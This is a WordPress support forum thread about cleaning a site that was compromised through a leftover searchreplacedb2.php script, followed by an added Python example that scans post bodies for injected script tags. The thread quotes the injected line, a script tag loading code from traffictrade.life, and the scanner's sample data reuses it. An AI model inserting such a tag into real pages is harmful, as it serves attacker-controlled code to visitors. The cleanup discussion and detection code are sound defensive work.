• Resolved appleaday

    (@appleaday)


    Yes, I was that fool, I neglected the importance of removing that file as soon as possible in order not to forget it where I dropped it. I also noticed in the past logs some POST requests, so someone must have taken advantage of that vulnerability. I read “How to Clean a Hacked WordPress Site using Wordfence” and everything that might be related to the problem. But so far no step-by-step guide to mend for the error on my own. I read “If You Use This Script, You’ve Probably Already Been Hacked” where a possible substitution is shown… but is that the only way things might have been changed? Should I necessarily resort to Premium Wordfence Support? That way will anyone eventually certify a sanitization and possibly reveal to me how he acted?

    Thanks in advance!

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter appleaday

    (@appleaday)

    UPDATE: I found several additions in the bodies of the posts, like the one below, coming before an anchor tag.

    <script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

    I used the same searchreplacedb2.php with the name changed to purge the tables from that rubbish and eventually delete that copy. Now I wonder what else I should check. Possibly any <script>…</script> in the bodies of the posts?
    What else?

    Thanks in advance!

    Hi,
    After making sure you have cleaned your website’s database from these spam entries using this tool, it’s highly recommended to delete it immediately, after reading your first post I thought you forgot where exactly you have this file on the server, but after reading the second one, I realized you have used it recently to clean the database, so for sure you know where is the file by now?

    Thanks.

    Thread Starter appleaday

    (@appleaday)

    I’m afraid I didn’t get for sure the question, anyway I try to answer.
    I can tell for sure where the file is and where there isn’t, since I never thought of giving it a completely unrelated name, except for the last time I used it, and I’m pretty sure I removed each copy of the script from any virtual host in use.

    In the meantime I also gave a look at the other tables (“posts” involves articles and static pages, I saw..) but I couldn’t find any table where something could profitably be inserted with a “search and replace” operation. For the moment I can assume the aim of the intrusion was just spamming pages and articles with redirections (the mentioned <script>). But I wonder what a paid Wordfence intervention could do in my stead.

    Thanks!

  • The topic ‘Forgot to remove searchreaplacedb2.php: what can I do now?’ is closed to new replies.
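
An added example, not part of the thread and not Wordfence's code: one way to check post bodies for `<script>` tags like the one quoted above, flagging inline scripts and scripts loaded from hosts outside an allowlist. The `(post_id, post_content)` row layout, the sample posts and the `ALLOWED_HOSTS` value are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (constructed value).
ALLOWED_HOSTS = {"example.org"}


class ScriptFinder(HTMLParser):
    """Collects every <script> start tag seen in one post body."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, host)

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if not src:
            self.findings.append(("inline", None))
            return
        # Typographic quotes can survive copy/paste; strip them with the plain ones.
        host = urlparse(src.strip("'\"\u2018\u2019 ")).hostname
        # A relative src has no host and is served by the site itself.
        if host is not None and host.lower() not in ALLOWED_HOSTS:
            self.findings.append(("external", host.lower()))


def scan_posts(rows):
    """rows: iterable of (post_id, post_content). Returns (post_id, kind, host) hits."""
    hits = []
    for post_id, content in rows:
        finder = ScriptFinder()
        finder.feed(content or "")
        finder.close()
        hits.extend((post_id, kind, host) for kind, host in finder.findings)
    return hits


# Constructed sample rows; post 101 carries the tag quoted in the thread.
SAMPLE_ROWS = [
    (101, "<p>Intro</p><script src='https://traffictrade.life/scripts.js' "
          "type='text/javascript'></script><a href='/about'>About</a>"),
    (102, "<p>Clean post with a <a href='https://example.org/'>link</a>.</p>"),
    (103, "<script src='https://example.org/js/gallery.js'></script><p>Gallery</p>"),
    (104, "<p>Text</p><script>/* constructed inline payload placeholder */</script>"),
]

if __name__ == "__main__":
    for hit in scan_posts(SAMPLE_ROWS):
        print(hit)
```

The same scan applies to any text column exported as `(id, text)` pairs, so it can be pointed at tables other than the posts table.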